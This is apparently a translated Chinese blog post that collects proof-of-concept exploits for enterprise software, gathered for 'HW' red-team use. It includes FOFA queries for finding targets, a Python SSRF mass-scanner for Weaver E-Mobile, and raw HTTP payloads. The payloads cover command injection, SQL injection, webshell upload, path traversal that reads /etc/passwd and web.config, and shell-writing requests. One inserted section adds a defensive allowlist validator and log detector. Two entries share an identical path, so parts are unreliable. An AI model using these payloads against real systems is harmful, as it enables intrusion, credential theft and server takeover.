The Weaver (泛微) E-Mobile installOperate.do endpoint contains a server-side request forgery (SSRF) vulnerability. An unauthenticated remote attacker can use it to scan ports on the server's internal network or on the local host, collect service banners, map the network layout, and even attack applications running internally or locally, obtaining sensitive internal server configuration and causing information disclosure.
FOFA query:

```
product="泛微-EMobile" || header="EMobileServer"
```

Request:

```http
GET /install/installOperate.do?svrurl=http://test.emobile.dnslog.cn HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Connection: close
```
```python
# encoding:utf-8
import time
import requests
import argparse
import ssl
import urllib3
from urllib3.exceptions import InsecureRequestWarning

# ssl._create_unverified_context: create an SSL context that does not verify the
# server certificate when making HTTPS requests.
ssl._create_default_https_context = ssl._create_unverified_context
# urllib3.disable_warnings(): suppress urllib3's insecure-request warning, i.e.
# do not print the warning raised for unverified HTTPS requests.
urllib3.disable_warnings(InsecureRequestWarning)

# Output colours
RED = '\033[31m'
GREEN = '\033[32m'
RESET = '\033[0m'


def check_vuln(url):
    url = url.strip("/")
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
    }
    headers1 = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
        "Cookie": "PHPSESSID=pgqapiopj5rssr6a2ejvsi69m3; b-user-id=98195658-f7ad-f233-35b2-5f6d469d240d"
    }
    dnslog_url = "http://dnslog.cn/getdomain.php"
    try:
        # Obtain a fresh DNSLog subdomain, then pass it to the target as svrurl.
        getdomain = requests.get(dnslog_url, headers=headers1, verify=False, timeout=15)
        target = url + "/install/installOperate.do?svrurl=http://1.qwe." + getdomain.text
        requests.get(target, headers=headers, verify=False, timeout=15)
        # Poll the DNSLog record list up to three times; a hit means the server
        # resolved the supplied name, i.e. the SSRF fired.
        for _ in range(0, 3):
            refresh = requests.get(url='http://dnslog.cn/getrecords.php', headers=headers1, timeout=60)
            time.sleep(1)
            if getdomain.text in refresh.text:
                print(f"{RED}[+] {url} 存在WeaverE-Mobile-installOperate-SSRF漏洞{RESET}")
                return True
        print(f"{GREEN}[-] {url} 不存在WeaverE-Mobile-installOperate-SSRF漏洞{RESET}")
        return False
    except Exception:
        print(f"{GREEN}[-] {url} 请求失败{RESET}")
        return False


def main():
    parser = argparse.ArgumentParser(description='WeaverE-Mobile-installOperate-SSRF漏洞')
    parser.add_argument('-u', '--url', help='目标URL')
    parser.add_argument('-f', '--file', help='目标URL文件')
    args = parser.parse_args()
    if args.url:
        args.url = "http://" + args.url if not args.url.startswith(('http://', 'https://')) else args.url
        check_vuln(args.url)
    elif args.file:
        with open(args.file, 'r') as f:
            urls = f.read().splitlines()
        for url in urls:
            url = "http://" + url if not url.startswith(('http://', 'https://')) else url
            check_vuln(url)


if __name__ == '__main__':
    main()
```
Usage:

```powershell
python .\WeaverE-Mobile-installOperate-SSRF.py -f .\1.txt
python .\WeaverE-Mobile-installOperate-SSRF.py -u 192.168.1.1:8088
```
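The defensive side of the issue described above, as an added example that is not part of the original post and not Weaver's code: `validate_svrurl()` is the kind of allowlist check a fix would apply before the server fetches a caller-supplied `svrurl`, and `find_ssrf_probes()` runs that same check over web-server access-log lines to surface `installOperate.do` requests whose `svrurl` points at a DNS-logging host or at an internal address. The allowlist host, the client addresses and the log lines are constructed for the example.

```python
# Added example (not from the original post, not Weaver's code): allowlist
# validation for the svrurl parameter plus an access-log detector built on it.
# ALLOWED_HOSTS, the IPs and SAMPLE_LOG below are constructed for the example.
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Hosts the installer is legitimately allowed to contact (assumed value).
ALLOWED_HOSTS = {"emobile.internal.example"}

# Apache/nginx combined-log style: client, request line, status code.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def validate_svrurl(raw_url, allowed_hosts=ALLOWED_HOSTS):
    """Return (ok, reason). ok is True only for http(s) URLs whose host is on
    the allowlist. Literal IPs in private, loopback, link-local or reserved
    ranges are rejected explicitly so the reason names the internal target."""
    try:
        parts = urlsplit(raw_url)
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # a hostname, not a literal address
    if ip is not None and (ip.is_private or ip.is_loopback
                           or ip.is_link_local or ip.is_reserved):
        return False, f"internal address {host}"
    if host not in allowed_hosts:
        return False, f"host {host} not on allowlist"
    return True, "ok"


def find_ssrf_probes(log_lines, allowed_hosts=ALLOWED_HOSTS):
    """Return one finding per installOperate.do request whose svrurl fails
    validate_svrurl(); other requests are ignored."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        if "/install/installOperate.do" not in path:
            continue
        # parse_qs percent-decodes the values for us.
        for target in parse_qs(urlsplit(path).query).get("svrurl", []):
            ok, reason = validate_svrurl(target, allowed_hosts)
            if not ok:
                findings.append({"client": m.group("client"), "svrurl": target,
                                 "reason": reason, "status": m.group("status")})
    return findings


# Constructed sample log: two probes (DNS-logging host, loopback), one
# legitimate installer call, one unrelated request.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2024:10:00:01 +0800] "GET /install/installOperate.do?svrurl=http://abc123.dnslog.example HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Aug/2024:10:00:02 +0800] "GET /install/installOperate.do?svrurl=http://127.0.0.1:8080 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Aug/2024:10:00:03 +0800] "GET /install/installOperate.do?svrurl=https://emobile.internal.example/ HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Aug/2024:10:00:04 +0800] "GET /login.do HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for f in find_ssrf_probes(SAMPLE_LOG):
        print(f"{f['client']} -> svrurl={f['svrurl']} ({f['reason']}, HTTP {f['status']})")
```

The validator deliberately checks the hostname string rather than resolving it: a name allowlist cannot be satisfied by an attacker-registered domain, and resolving first would reintroduce a DNS-rebinding window. Whatever fetches the allowed URL should also have redirects disabled, since an allowed host that redirects to an internal address would otherwise bypass the check.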
F-logic DataCube3 command execution vulnerability (CVE-2024-7066)

fofa: title=="DataCube3"

```http
POST /admin/config_time_sync.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 116
Content-Type: application/x-www-form-urlencoded
Cookie: SESS_IDS=24ef0vbucnke26mtreijnfumve
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36

accesstime=0.66992700 1710752870&execute=&ntp_enable=&ntp_server=127.0.0.1|id >aaa.txt|&ntp_retry_count=1
```

Jinhui (金慧) Integrated Management Information System SQL injection vulnerability

```http
POST /Portal/LoginBegin.aspx?ReturnUrl=%2f HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0

Todo=Validate&LoginName=1%27+AND+5094+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%285094%3D5094%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29+AND+%27JKJg%27%3D%27JKJg&Password=&CDomain=Local&FromUrl=
```

Yonyou (用友) Shikong KSOA PreviewKPQT SQL injection vulnerability

fofa: product="用友-时空KSOA"

```http
GET /kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
```

FanRuan (帆软) ReportServer SQL injection vulnerability

```http
GET /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Faaa.jsp%27%20as%20gggggg%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20gggggg.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20gggggg.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B'),1,1)} HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
```

Jinher (金和) OA C6 GeneralXmlhttpPage.aspx SQL injection vulnerability

```http
GET /C6/Jhsoft.Web.appraise/AppraiseScoreUpdate.aspx/GeneralXmlhttpPage.aspx/?id=%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A4 HTTP/1.1
```

Baiyiyun (百易云) Asset Management and Operations System arbitrary file upload

```http
POST /comfileup.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=--------1110146050

----------1110146050
Content-Disposition: form-data; name="file";filename="rce.php"

<?php system("whoami");unlink(__FILE__);?>
----------1110146050--
```

Leagsoft (联软) Andu UniNXG Secure Data Exchange System SQL injection vulnerability

```
UniExServices/link/queryLinklnfo?address=';SELECT PG_SLEEP(5)--
```

Tianwen (天问) Property Management ERP ContractDownLoad arbitrary file read vulnerability

```
/HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config
```

Tianwen (天问) Property Management ERP AreaAvatarDownLoad arbitrary file read vulnerability

```
/HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config
```

Yonyou (用友) NC UserAuthenticationServlet deserialization vulnerability

```http
POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Length: 114

{"clientParam":"{\"x\":{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"1ksla7e.dnslog.cn\"}}}"}
```

Yonyou (用友) U8Cloud ActionServlet SQL injection

```http
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

Hikvision (海康威视) Integrated Security Management Platform detection unauthenticated remote command execution

```http
POST /center/api/installation/detection HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json;charset=UTF-8

{"type":"environment","operate":"","machines":{"id": "$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)"}
```

Bazarr swaggerui component directory traversal leading to arbitrary file read

```http
GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
```

H3C Workspace cloud desktop remote command execution vulnerability

fofa: "H3C Workspace"

```
/webui/?g=aaa_portal_auth_adv_submit&tab_name=广告模板&welcome_word=广告模板&btn_color=337ab7&suffix=%7Burlenc(%60id+%3E/usr/local/webui/test.txt%60)%7D&bkg_flag=0&check_btn_color=&des=undefined
```

1Panel remote code execution vulnerability

```http
GET /.git/config HTTP/1.1
Host:
User-Agent: test',"test", "test", "", "YmxvZy5tbzYwLmNu", "test", 0, "deny", 0, 1);ATTACH DATABASE '/www/sites/test/index/test.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo();');#
Connection: close
```

Landray (蓝凌) EKP remote code execution vulnerability

```
/ekp/sys/ui/sys_ui_component/sysUiComponent.do?method=replaceExtend&extendId=../../../../resource/help/km/review/&folderName=../../../ekp/sys/common
```

Weaver (泛微) e-cology9 /services/WorkPlanService unauthenticated SQL injection

```http
POST /services/WorkPlanService HTTP/1.1
Host:
Content-Length: 380
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/120.0.6367.118 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Referer: http://0.0.0.0/services/WorkPlanService
Cookie: ecology_JSessionid=bibwzto5sdeg43J9Fz0iu
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
   <soapenv:Header/>
   <soapenv:Body>
      <web:deleteWorkPlan>
         <!--type: string-->
         <web:in0>(SELECT 123 FROM (SELECT(SLEEP(3-(IF(1=1,0,5)))))NZeo)</web:in0>
         <!--type: int-->
         <web:in1>22</web:in1>
      </web:deleteWorkPlan>
   </soapenv:Body>
</soapenv:Envelope>
```

Weaver (泛微) E-Mobile installOperate.do SSRF vulnerability

FOFA: header="EMobileServer"

```http
GET /install/installOperate.do?svrurl=http://dnslog.cn HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
```

ESAFENET (亿赛通) Electronic Document Security Management System NoticeAjax endpoint SQL injection vulnerability

fofa: app="亿赛通-DLP"

```http
POST /CDGServer3/NoticeAjax;Service HTTP/1.1
Host: x.x.x.x:8443
Cookie: JSESSIONID=A7058CC5796E5F433F2CC668C7B7B77D; JSESSIONID=0E09F2450421C51339E5657425612536
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close
Content-Length: 98
Content-Type: application/x-www-form-urlencoded

command=delNotice&noticeId=111';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
```

ESAFENET (亿赛通) Electronic Document Security Management System NetSecConfigAjax endpoint SQL injection vulnerability

fofa: app="亿赛通-DLP"

```http
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host: x.x.x.x
Cookie: JSESSIONID=99CEC1B294F4EEEA7AFC46D8D4741917; JSESSIONID=06DCD58EDC037F785605A29CD7425C66
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

command=updateNetSec&state=*
```
Originally published on the WeChat official account 扫地僧的茶饭日常: [Vulnerability Reproduction] Weaver E-Mobile installOperate.do SSRF vulnerability | HW POC